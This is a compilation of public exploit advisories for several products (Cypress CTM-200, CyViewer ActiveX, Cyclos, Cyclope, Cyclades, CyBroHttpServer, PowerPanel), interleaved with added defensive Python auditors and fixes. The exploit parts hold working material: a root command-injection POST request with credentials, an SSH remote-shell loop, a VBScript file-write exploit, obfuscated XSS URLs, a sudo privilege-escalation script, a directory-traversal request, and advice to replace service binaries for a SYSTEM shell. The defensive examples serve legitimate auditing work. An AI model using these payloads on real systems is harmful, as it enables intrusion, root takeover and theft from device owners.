rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
rsh.connect(adrs,username=unme,password=pwrd)
while 1:
    cmnd=input('# ')
    if cmnd=='exit':
        break
    stdin,stdout,stderr=rsh.exec_command(cmnd)
    stdin.close()
    print(str(stdout.read().decode()))
rsh.close()
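The advisory header reproduces the device's /var/config/passwd and /etc/shadow, and those files are exactly what a defender can audit on a firmware image before it is deployed. As an added example (not the advisory author's code), the following Python runs the checks that would have surfaced this finding: accounts sharing one password hash (same salt, same password), more than one UID-0 account, accounts that are not locked, and hashes using an obsolete algorithm. The sample inputs are the lines quoted in the advisory above; the locked-marker and weak-algorithm lists are assumptions.

```python
from collections import defaultdict

# Lines quoted in the advisory header above (CTM-200 /var/config/passwd).
CTM200_PASSWD = """\
root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
daemon:*:65534:65534:daemon:/var:/bin/false
"""

# Lines quoted in the advisory header above (CTM-ONE /etc/shadow).
CTMONE_SHADOW = """\
admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
daemon:*:16009:0:99999:7:::
bin:*:16009:0:99999:7:::
sys:*:16009:0:99999:7:::
ftp:*:16009:0:99999:7:::
nobody:*:16009:0:99999:7:::
messagebus:!:16009:0:99999:7:::
"""

LOCKED_MARKERS = ("*", "!", "!!", "x", "")   # 'x' in passwd means "see shadow"


def parse_entries(text: str) -> list:
    """Split passwd/shadow text into field lists; blank lines and comments are skipped."""
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def is_locked(hash_field: str) -> bool:
    return hash_field in LOCKED_MARKERS or hash_field.startswith("!")


def shared_hashes(text: str) -> dict:
    """Hash -> accounts, for every hash used by more than one account.
    An identical hash means identical salt and identical password, i.e. the
    image was built with one password for both accounts."""
    by_hash = defaultdict(list)
    for fields in parse_entries(text):
        if not is_locked(fields[1]):
            by_hash[fields[1]].append(fields[0])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def uid_zero_accounts(passwd_text: str) -> list:
    """Every account that is root-equivalent by UID (passwd format, 7 fields)."""
    return [f[0] for f in parse_entries(passwd_text) if len(f) == 7 and f[2] == "0"]


def unlocked_accounts(text: str) -> list:
    """Accounts that can authenticate with a password at all."""
    return [f[0] for f in parse_entries(text) if not is_locked(f[1])]


def weak_hash_accounts(text: str) -> list:
    """Accounts whose hash uses md5crypt ('$1$') or traditional DES (no '$' prefix)."""
    weak = []
    for fields in parse_entries(text):
        h = fields[1]
        if is_locked(h):
            continue
        if h.startswith("$1$") or not h.startswith("$"):
            weak.append(fields[0])
    return weak


def audit(text: str) -> dict:
    """Combine the checks into one report for a passwd- or shadow-style file."""
    return {
        "shared_hashes": shared_hashes(text),
        "uid_zero": uid_zero_accounts(text),
        "unlocked": unlocked_accounts(text),
        "weak_hash": weak_hash_accounts(text),
    }


if __name__ == "__main__":
    for name, text in (("CTM-200 passwd", CTM200_PASSWD), ("CTM-ONE shadow", CTMONE_SHADOW)):
        print(name, audit(text))
```

On the CTM-200 file every check fires at once: root and admin share one md5crypt hash, both are UID 0, and both are unlocked. The CTM-ONE shadow file passes the hash checks, which is the point of the advisory: a sound hash format does not help when the password behind it is the same on every unit.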
# Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca
Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection
Vendor: Cypress Solutions Inc.
Product web page: https://www.cypress.bc.ca
Affected version: 2.7.1.5659
2.0.5.3356-184
Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications.
The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor.
Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site
office and SCADA communications.
Desc: The CTM-200 wireless gateway suffers from an authenticated, semi-blind OS command injection
vulnerability. It can be exploited to inject and execute arbitrary shell commands as the root user
through the 'ctm-config-upgrade.sh' script, which passes the 'fw_url' POST parameter as the argument
of the 'cmd upgradefw' command; cmd hands it via execv() to the /usr/bin/cmdmain ELF binary, where the
make_wget_url() function builds a wget command line from it and ctmsys() executes that command line.
================================================================================================
/www/cgi-bin/webif/ctm-config-upgrade.sh:
-----------------------------------------
136: if ! empty "$FORM_install_fw_url"; then
137: echo "</pre>"
138: echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>"
139: cmd upgradefw "$FORM_fw_url"
140: unset FORM_install_fw_url FORM_submit
141: echo "</pre><br />Done."
142: fi
==================================================================
cmdmain (ELF):
memset(&DAT_0003bd1c,0,0x80);
make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c);
sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
*(undefined4 *)(iParm2 + 8));
ctmsys(local_184);
sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));
iVar3 = ctm_fopen(local_184,"r");
if (iVar3 == 0) {
uVar5 = *(undefined4 *)(iParm2 + 8);
__s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";
goto LAB_0001f4a8;
}
ctm_fclose();
memset(local_184,0,0x100);
sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
*(undefined4 *)(iParm2 + 8));
ctmsys(local_184);
=================================================================
cmd (ELF):
while (sVar1 = strlen(__s2), uVar7 < sVar1) {
__s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);
__s2 = *ppcVar8;
uVar7 = uVar7 + 1;
}
uStack180 = 0x7273752f;
uStack176 = 0x6e69622f;
uStack172 = 0x646d632f;
uStack168 = 0x6d632f73;
uStack164 = 0x69616d64;
uStack160 = 0x6e;
uStack159 = 0;
iVar2 = execv((char *)&uStack180,ppcParm2);
================================================================================================
Tested on: GNU/Linux 2.6.32.25 (arm4tl)
BusyBox v1.15.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5687
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php
21.09.2021
--
PoC POST request:
-----------------
POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Content-Length: 611
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Q2hhbWVsZW9u
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: style=null
sec-gpc: 1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="submit"
1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="upgradefile"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="fw_url"
`id`
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="install_fw_url"
Start Firmware Upgrade from URL
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="pkgurl"
------WebKitFormBoundaryZlABvwQnpLtpe9mM--
Response:
---------
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http: //www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http: //www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...
...
Firmware Management
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
Saving configuration ...
downloading firmware image: gid=0(root)/uid=0(root).tar
found image:
extracting image files
Verifying checksum of downloaded firmware image
Image checksum failed
OK
Done.
...
...
</div>
<br />
<fieldset id="save">
<legend><strong>Proceed Changes</strong></legend>
<div class="page-save"><input id="savebutton" type="submit" name="action" value="Save Changes to Page" /></div>
<ul class="apply">
<li><a href="config.sh?mode=save&cat=Config&prev=/cgi-bin/webif/ctm-config-upgrade.sh" rel="lightbox" >» Save Configuration «</a></li>
</ul>
</fieldset>
</form>
<hr />
<div id="footer">
<h3>X-Wrt</h3>
<em>End user extensions for OpenWrt</em>
</div>
</div> <!-- End #container -->
</body>
</html>
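The root cause in cmdmain is that fw_url is pasted into a command string with sprintf() and handed to a shell by ctmsys(), so anything the shell interprets, the backticks in the PoC included, runs as root. As an added example (not Cypress's code and not the advisory author's; the host and path grammar, the destination-name rule and the argv layout are assumptions), the Python below shows the two fixes that close this class of bug: a strict allow-list validator for the URL, and an argv-list invocation of wget with no shell in between. The candidate URLs in the demo are constructed.

```python
import re
import subprocess
from urllib.parse import urlsplit

HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,253}")
PATH_RE = re.compile(r"/[A-Za-z0-9._/-]*")
NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


class InvalidFirmwareUrl(ValueError):
    """Raised for anything that is not a plain http(s) URL made of safe characters."""


def validate_firmware_url(url: str) -> str:
    """Allow-list validation; returns a normalised URL or raises InvalidFirmwareUrl.

    Everything the vulnerable sprintf()+shell path would mis-handle is refused
    up front: whitespace and control characters, backticks, quotes, $(), ;, |,
    &, userinfo, query strings, fragments, non-http schemes and '..' segments.
    """
    if not url or len(url) > 512 or any(not 0x21 <= ord(c) <= 0x7E for c in url):
        raise InvalidFirmwareUrl("empty, oversized, or contains whitespace/control characters")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise InvalidFirmwareUrl(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None or parts.query or parts.fragment:
        raise InvalidFirmwareUrl("userinfo, query and fragment are not allowed")
    host = parts.hostname
    if not host or not HOST_RE.fullmatch(host):
        raise InvalidFirmwareUrl(f"bad host: {host!r}")
    try:
        port = parts.port
    except ValueError as exc:
        raise InvalidFirmwareUrl("bad port") from exc
    path = parts.path or "/"
    if not PATH_RE.fullmatch(path) or "/../" in path + "/":
        raise InvalidFirmwareUrl(f"bad path: {path!r}")
    return f"{parts.scheme}://{host}{':' + str(port) if port else ''}{path}"


def is_valid_firmware_url(url: str) -> bool:
    try:
        validate_firmware_url(url)
        return True
    except InvalidFirmwareUrl:
        return False


def download_command(url: str, dest_name: str) -> list:
    """argv for the download. A list, not a string: no shell ever sees the URL,
    and '--' ends option parsing so the URL can never be read as a wget option."""
    safe_url = validate_firmware_url(url)
    if not NAME_RE.fullmatch(dest_name):
        raise InvalidFirmwareUrl(f"bad destination name: {dest_name!r}")
    return ["wget", "-q", "-O", f"/tmp/{dest_name}", "--", safe_url]


def download_firmware(url: str, dest_name: str, timeout: float = 300) -> int:
    """Run the download without a shell; returns wget's exit status."""
    return subprocess.run(download_command(url, dest_name), timeout=timeout, check=False).returncode


if __name__ == "__main__":
    for candidate in ("http://203.0.113.5/fw/ctm200.tar", "`id`", "http://203.0.113.5/fw.tar;id"):
        print(f"{candidate!r}: {'accepted' if is_valid_firmware_url(candidate) else 'refused'}")
    print(download_command("http://203.0.113.5/fw/ctm200.tar", "ctm200.tar"))
```

The argv form alone would already stop the backtick payload, because nothing interprets it; the validator is still worth having so that a hostile URL cannot smuggle wget options or redirect the download elsewhere. Note that the validator does not check where the host points, so an image fetched from an attacker-chosen server still needs the signature check the upgrade path is supposed to perform.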
source: https://www.securityfocus.com/bid/48483/info
CygniCon CyViewer ActiveX control is prone to a vulnerability caused by an insecure method.
Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
<html>
<object classid='clsid:A6FC2988-16BE-4053-BE89-F562431FD6ED' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create"
arg2="Data"
target.SaveData arg1 ,arg2
End Sub
</script>
</html>
# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
# Date: 18/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31674
# Description:
Cyclos 4 PRO 4.14.7 and earlier does not validate user input in its error information, which allows a remote unauthenticated attacker to execute JavaScript code via an undefined enum.
# Steps to reproduce:
An attacker sends a crafted URL
[IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim.
When a victim opens the URL, XSS will be triggered.
# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
# Date: 17/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31673
# Description:
A DOM-based Cross-Site Scripting (XSS) vulnerability in the account registration page of Cyclos 4 PRO 4.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.
# Steps to reproduce:
An attacker sends a crafted URL
[IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.
When a victim opens the URL, XSS will be triggered.
# Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution (again)
# Version: <= 6.8.1
# Vendor Site: http://www.cyclope-series.com/
# Software Download: http://www.cyclope-series.com/download/index.html
# Link: http://www.cyclope-series.com/setups/setup.exe
# Software description:
# The employee monitoring software developed by Cyclope-Series is specially designed to inform
# and equip management with statistics relating to the productivity of staff within their organization.
# Vulnerability:
# Due to insecure file permissions, a low-privileged user could potentially
# delete, modify or replace many of the key executable files used and needed
# by the software.
# Although I haven't checked older versions, I do recall seeing the same file
# permissions being set, making this software extremely prone to lots of fun stuff.
''' File Information '''
A few files with odd-ball permissions. Keep in mind all files are like this:
all files in c:\xampplite, as well as in Program Files.
The "CyclopeClient.exe" is what is pushed to workstations in order to monitor
employees. As we can see, this file's permission is set to "Everybody". So is the
uninstaller executable.
So, gain access to the system, and as a low-privileged user one can
easily replace httpd.exe or mysqld.exe with an evil EXE file.
The next time that file is executed, you'll get your shell as SYSTEM.
Although they'll be out of a service...bummer
# C:\xampplite\mysql\bin>icacls mysqld.exe
# mysqld.exe BUILTIN\Administrators:(I)(F)
# NT AUTHORITY\SYSTEM:(I)(F)
# BUILTIN\Users:(I)(RX)
# NT AUTHORITY\Authenticated Users:(I)(M)
#
# Successfully processed 1 files; Failed processing 0 files
----
# C:\xampplite\apache\bin>icacls httpd.exe
# httpd.exe BUILTIN\Administrators:(I)(F)
# NT AUTHORITY\SYSTEM:(I)(F)
# BUILTIN\Users:(I)(RX)
# NT AUTHORITY\Authenticated Users:(I)(M)
#
# Successfully processed 1 files; Failed processing 0 files
----
# C:\xampplite\mysql\bin>icacls mysql.exe
# mysql.exe BUILTIN\Administrators:(I)(F)
# NT AUTHORITY\SYSTEM:(I)(F)
# BUILTIN\Users:(I)(RX)
# NT AUTHORITY\Authenticated Users:(I)(M)
#
# Successfully processed 1 files; Failed processing 0 files
----
# C:\Program Files\Cyclope\Client>icacls CyclopeClient.exe
# CyclopeClient.exe Everyone:(F)
#
# Successfully processed 1 files; Failed processing 0 files
----
# C:\Program Files\Cyclope>icacls unins000.exe
# unins000.exe Everyone:(F)
#
# Successfully processed 1 files; Failed processing 0 files
..
..
etc..
..
..
Way too many files to list, essentially whatever this thing installs it's up for grabs.
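A defender's version of the check above, added here as an example (it is not part of the Offensive Security advisory): it parses icacls output, using the listing shown above as constructed sample input in icacls' native indented layout, and flags executables that any principal outside Administrators/SYSTEM can modify. Only Python's standard library is used; the TRUSTED and WRITE_RIGHTS sets are assumptions about what should count as expected write access.

```python
import re

# icacls output as reproduced in the advisory above (constructed sample in icacls'
# native layout: file name on the first line, continuation ACEs indented).
ICACLS_OUTPUT = r"""mysqld.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
CyclopeClient.exe Everyone:(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals expected to hold write access on service binaries (assumption).
TRUSTED = {
    "BUILTIN\\Administrators",
    "NT AUTHORITY\\SYSTEM",
    "NT SERVICE\\TrustedInstaller",
    "CREATOR OWNER",
}

# Simple rights (F, M, W) and specific rights that allow changing or replacing the file.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "D", "DC"}


def parse_icacls(text):
    """Return a list of (file, principal, rights) triples from icacls output."""
    entries = []
    current_file = None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("Successfully processed"):
            continue
        if raw[0].isspace():
            ace = raw.strip()                          # continuation line: ACE only
        else:
            current_file, _, ace = raw.partition(" ")  # first line: "<file> <ACE>"
            ace = ace.strip()
        principal, _, flags = ace.partition(":")
        # "(I)(OI)(CI)(RX,WD)" -> {"I", "OI", "CI", "RX", "WD"}
        rights = {r.strip() for grp in re.findall(r"\(([^)]*)\)", flags) for r in grp.split(",")}
        entries.append((current_file, principal.strip(), rights))
    return entries


def writable_by_untrusted(entries):
    """(file, principal) pairs where a principal outside TRUSTED can modify the file."""
    findings = {
        (file, principal)
        for file, principal, rights in entries
        if principal not in TRUSTED and rights & WRITE_RIGHTS
    }
    return sorted(findings)


if __name__ == "__main__":
    for file, principal in writable_by_untrusted(parse_icacls(ICACLS_OUTPUT)):
        print(f"{file}: writable by {principal}")
```

On the sample, BUILTIN\Users with (RX) is not reported, while Authenticated Users with (M) on mysqld.exe and Everyone with (F) on CyclopeClient.exe are; feeding the script the output of `icacls <dir> /T` covers a whole install tree.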
# Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation
# Date: 09 Feb 2022
# Exploit Author: @ibby
# Vendor Homepage: https://www.vertiv.com/en-us/
# Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip
# Version: Legacy Versions V_1.0.0 to V_3.3.0-16
# Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16)
# CVE : N/A
# The reason this exists is that the admin user and the admin group are the default user for these devices. The software ships with overly permissive sudo privileges
# for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software; the last version is from ~2014.
# This vulnerability does not exist in the newer distributions of the ACS Software.
#!/bin/bash
## NOTE: To view the vulnerability yourself, uncomment the below code & run as sudo, since it's mounting a file system.
## The software is publicly available, this will grab it and unpack the firmware for you.
#TMPDIR=$(mktemp -d)
#curl 'https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip' -o FL0536-017.zip && unzip FL0536-017.zip && binwalk -e FL0536-017.bin
#sudo mount -o ro,loop _FL0536-017.bin.extracted/148000 $TMPDIR && sudo cat "$TMPDIR/etc/sudoers"
#echo "As you can see, the sudo permissions on various binaries, like that of /bin/mv, are risky."
# ! EXPLOIT CODE BELOW ! #
# -------
# Once you exit the root shell, this will clean up and put the binaries back where they belong.
echo "Creating backups of sed & bash binaries"
sudo cp /bin/sed /bin/sed.bak
sudo cp /bin/bash /bin/bash.bak
echo "Saved as bash.bak & sed.bak"
sudo mv /bin/bash /bin/sed
sudo /bin/sed
echo "Replacing our binary with the proper one"
sudo mv /bin/bash.bak /bin/bash && sudo mv /bin/sed.bak /bin/sed
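As an added example (not the advisory's code, and not the firmware's real sudoers file), a small audit script that reads sudoers user specifications and reports entries letting a non-root user run, as root and without argument restrictions, a tool that can overwrite or replace any file, which is the class of grant the /bin/mv entry above belongs to. The SAMPLE_SUDOERS text and the FILE_WRITE_BINARIES set are constructed for illustration.

```python
import re

# Constructed sudoers excerpt for illustration; NOT the firmware's real file.
SAMPLE_SUDOERS = """\
# User privilege specification
root     ALL=(ALL) ALL
admin    ALL=(ALL) NOPASSWD: /bin/mv, /bin/cp, /usr/bin/passwd
%admin   ALL=(ALL) NOPASSWD: /bin/mv
%wheel   ALL=(ALL) /sbin/reboot
operator ALL=(root) /usr/sbin/tcpdump -i eth0
"""

# Tools that, run as root with caller-chosen arguments, overwrite or replace any
# file on the system (the advisory's /bin/mv case); granting them is equivalent
# to granting root. The set is an assumption for this example.
FILE_WRITE_BINARIES = {"/bin/mv", "/bin/cp", "/bin/chmod", "/bin/chown", "/bin/dd", "/usr/bin/tee"}

SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
NON_SPEC_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text):
    """Return (who, runas, tags, commands) for each user specification line."""
    specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith(NON_SPEC_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        cmds = m.group("cmds")
        tags = set()
        while True:                               # peel leading tags such as NOPASSWD:
            t = re.match(r"^([A-Z]+):\s*", cmds)
            if not t:
                break
            tags.add(t.group(1))
            cmds = cmds[t.end():]
        commands = [c.strip() for c in cmds.split(",") if c.strip()]
        runas = (m.group("runas") or "root").split(":")[0]   # "(user:group)" -> user
        specs.append((m.group("who"), runas, tags, commands))
    return specs


def risky_entries(specs):
    """(who, binary, nopasswd) for non-root entries that may run an unrestricted
    file-write tool, or anything at all, as root."""
    findings = []
    for who, runas, tags, commands in specs:
        if who == "root" or runas not in ("ALL", "root"):
            continue
        for cmd in commands:
            argv = cmd.split()
            if cmd == "ALL":
                findings.append((who, "ALL", "NOPASSWD" in tags))
            elif argv[0] in FILE_WRITE_BINARIES and len(argv) == 1:
                findings.append((who, argv[0], "NOPASSWD" in tags))
    return findings


if __name__ == "__main__":
    for who, binary, nopasswd in risky_entries(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{who}: may run {binary} as root{' without a password' if nopasswd else ''}")
```

The tcpdump entry is not reported because its arguments are pinned in the rule; a rule like `/bin/mv` with no arguments lets the caller choose both source and destination, which is the condition the script keys on. Running the same parser over the sudoers file extracted with the commented-out commands above is the check the advisory describes.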
# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE: CVE-2018-16133
# PoC
https://<host>\..\..\..\..\Windows\win.ini
# CVE-2018-16133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.png
GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows 7 - 64-bit
# CVE-2018-16134
# PoC
http://<host>/<script>alert('xss');</script>
GET <script>alert('xss');</script> HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
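The two CyBroHttpServer findings above (traversal via backslash-separated `..` segments, and the request target reflected unescaped) are both handled in this added example, which is not the vendor's code; the document root, file list and handler names are constructed for illustration:

```python
import html
import posixpath
from urllib.parse import unquote

# Hypothetical document root and the files that exist under it (constructed).
WEB_ROOT = "/srv/cybro/www"
KNOWN_FILES = {"/srv/cybro/www/index.html", "/srv/cybro/www/css/site.css"}


class Traversal(Exception):
    pass


def resolve_request_path(raw_target, root=WEB_ROOT):
    """Map a request target to a path under root, or raise Traversal.

    Percent-encoding is decoded first and backslashes are treated as separators
    (Windows hosts such as the advisory's accept them), so "\\..\\..\\Windows\\win.ini"
    and "%2e%2e/" are normalised before the containment check."""
    path = unquote(raw_target).split("?", 1)[0].replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise Traversal(raw_target)
    return candidate


def not_found_body(raw_target):
    """404 page that echoes the target only after HTML-escaping it; echoing it raw
    is the reflected XSS reported above."""
    return ("<html><body><h1>404 Not Found</h1><p>No such resource: "
            + html.escape(raw_target, quote=True) + "</p></body></html>")


def handle(raw_target):
    """Return (status, body_or_path) the way a minimal static-file handler would."""
    try:
        path = resolve_request_path(raw_target)
    except Traversal:
        return 403, "<html><body><h1>403 Forbidden</h1></body></html>"
    if path not in KNOWN_FILES:
        return 404, not_found_body(raw_target)
    return 200, path   # a real server would stream this file


if __name__ == "__main__":
    for target in ("/index.html", "\\..\\..\\..\\..\\Windows\\win.ini", "/<script>alert('xss');</script>"):
        print(target, "->", handle(target))
```

The containment test compares the normalised absolute path against the root rather than looking for `..` substrings, so encoded, mixed-separator and over-long variants all fall out of the same check; the 404 body is the only place user input reaches HTML, and it passes through `html.escape` on the way.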
CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval
Vendor: CyberPower Systems, Inc.
Product web page: https://www.cyberpowersystems.com
Affected version: 3.1.2 (37567) Business Edition
Summary: The PowerPanel® Business Edition software from
CyberPower provides IT professionals with the tools they
need to easily monitor and manage their backup power.
Available for compatible CyberPower UPS models, this
software supports up to 250 clients, allowing users remote
access (from any network PC with a web browser) to instantly
access vital UPS battery conditions, load levels, and runtime
information. Functionality includes application/OS shutdown,
event logging, hibernation mode, internal reports and analysis,
remote management, and more.
Desc: PowerPanel suffers from an unauthenticated XML External
Entity (XXE) vulnerability using the DTD parameter entities
technique resulting in disclosure and retrieval of arbitrary
data on the affected node via out-of-band (OOB) attack. The
vulnerability is triggered when input passed to the xmlservice
servlet using the ppbe.xml script is not sanitized while parsing the
xml inquiry payload returned by the JAXB element translation.
================================================================
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\
\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
------------------------
XmlServiceServlet.class:
------------------------
94: private InquirePayload splitInquirePayload(InputStream paramInputStream)
95: throws RequestException
96: {
97: try
98: {
99: JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
100: Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
101: JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
102: return (InquirePayload)localJAXBElement.getValue();
103: }
104: catch (JAXBException localJAXBException)
105: {
106: localJAXBException.printStackTrace();
107: throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
108: }
109: }
---
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
--------
web.xml:
--------
28: <servlet>
29: <servlet-name>xmlService</servlet-name>
30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
31: <load-on-startup>3</load-on-startup>
32: </servlet>
..
..
60: <servlet-mapping>
61: <servlet-name>xmlService</servlet-name>
62: <url-pattern>/ppbe.xml</url-pattern>
63: </servlet-mapping>
================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 EN
Microsoft Windows 8
Microsoft Windows Server 2012
Linux (64bit)
